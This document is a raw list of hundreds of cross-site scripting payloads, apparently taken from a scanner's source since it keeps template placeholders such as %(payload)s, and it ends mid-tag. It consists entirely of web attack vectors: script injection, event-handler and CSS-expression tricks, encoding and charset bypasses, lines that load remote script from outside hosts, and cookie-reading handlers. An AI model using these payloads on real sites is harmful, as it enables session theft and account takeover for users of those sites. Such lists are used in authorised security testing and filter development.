"`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\x21javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x20javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(1)</script> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1)</script> <script\x20>javascript:alert(1)</script> <script\x0D>javascript:alert(1)</script> <script\x0A>javascript:alert(1)</script> <script\x0C>javascript:alert(1)</script> <script\x00>javascript:alert(1)</script> <script\x09>javascript:alert(1)</script> "><img src=x onerror=javascript:alert(1)> "><img src=x onerror=javascript:alert('1')> "><img src=x onerror=javascript:alert("1")> "><img src=x onerror=javascript:alert(`1`)> "><img src=x onerror=javascript:alert(('1'))> "><img src=x onerror=javascript:alert(("1"))> "><img src=x onerror=javascript:alert((`1`))> "><img src=x onerror=javascript:alert(A)> "><img src=x onerror=javascript:alert((A))> "><img src=x onerror=javascript:alert(('A'))> "><img src=x onerror=javascript:alert('A')> "><img src=x onerror=javascript:alert(("A"))> "><img src=x onerror=javascript:alert("A")> "><img src=x onerror=javascript:alert((`A`))> "><img src=x onerror=javascript:alert(`A`)> `"'><img src=xxx:x onerror\x0B=javascript:alert(1)> `"'><img src=xxx:x onerror\x00=javascript:alert(1)> `"'><img src=xxx:x onerror\x0C=javascript:alert(1)> `"'><img src=xxx:x onerror\x0D=javascript:alert(1)> `"'><img src=xxx:x onerror\x20=javascript:alert(1)> `"'><img src=xxx:x onerror\x0A=javascript:alert(1)> `"'><img src=xxx:x onerror\x09=javascript:alert(1)> <script>javascript:alert(1)<\x00/script> <img src=# onerror\x3D"javascript:alert(1)" > <input onfocus=javascript:alert(1) autofocus> <input onblur=javascript:alert(1) autofocus><input autofocus> <video poster=javascript:javascript:alert(1)// <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X <video><source onerror="javascript:javascript:alert(1)"> <video onerror="javascript:javascript:alert(1)"><source> <form><button formaction="javascript:javascript:alert(1)">X <body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)"> <!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(1)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script src="javascript:alert(1)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x <? foo="><script>javascript:alert(1)</script>"> <! foo="><script>javascript:alert(1)</script>"> </ foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> <% foo><x foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29> <style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style> <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">ºscriptæjavascript:alert(1)º/scriptæ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(1)"> <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)>"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(1)</script> <IMG SRC="javascript:javascript:alert(1);"> <IMG SRC=javascript:javascript:alert(1)> <IMG SRC=`javascript:javascript:alert(1)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> <BODY ONLOAD=javascript:alert(1)> <BODY ONLOAD=javascript:javascript:alert(1)> <IMG SRC="jav ascript:javascript:alert(1);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <IMG DYNSRC="javascript:javascript:alert(1)"> <IMG LOWSRC="javascript:javascript:alert(1)"> <BGSOUND SRC="javascript:javascript:alert(1);"> <BR SIZE="&{javascript:alert(1)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <DIV STYLE="background-image: url(javascript:javascript:alert(1))"> <DIV STYLE="width:expression(javascript:alert(1));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> <XSS STYLE="xss:expression(javascript:alert(1))"> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(1);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="jav&#65ascript:javascript:alert(1)">test1</a> <a href="jav&#97ascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="&LT;iframe&sol;srcdoc=&lt;img&sol;src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14;  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptæalert(¢XSS¢)º/scriptæ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe  src="&Tab;javascript:prompt(1)&Tab;"> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt >alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert(1)">X </script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'> <img/ &#11; src=`~` onerror=prompt(1)> <form><iframe &#11; src="javascript:alert(1)"&#11; ;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" &#11;>X</a http://www.google<script .com>alert(document.location)</script <a href=[&#00;]"&#00; onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( &#00;</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) "><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //<form/action=javascript:alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061l&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a 